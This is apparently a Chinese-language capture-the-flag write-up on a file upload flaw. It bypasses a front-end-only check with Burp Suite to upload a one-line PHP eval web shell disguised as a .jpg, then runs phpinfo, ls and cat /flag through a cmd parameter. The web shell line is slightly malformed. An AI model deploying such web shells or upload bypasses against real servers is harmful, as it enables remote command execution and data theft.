文件上传漏洞
这里上传文件我们可以打开检查,可以看到该页面对上传文件做了相关的限定,但是只是在前端页面进行了相关的验证,后端不知道,但是我们可以试试绕过前端的校验,可以在设置中禁用javascript,也可以进行burpsuite进行抓包
这里使用抓包,上传的文件木马为获取该服务器的cmd权限
这里的校验为前端,我们上传木马文件
<?php @eval($_GET'cmd');?>木马文件需要后缀为jpg,这里使用burpsuite抓包后修改后缀后在发送
这里发送完成后就可以访问服务器了
检查一下是否拥有权限
核心代码
?cmd=phpinfo();
权限拥有,找到flag只需要查看该服务器的文件目录
核心代码
?cmd=system('ls /');
查看flag就好了
?cmd=system('cat /flag');
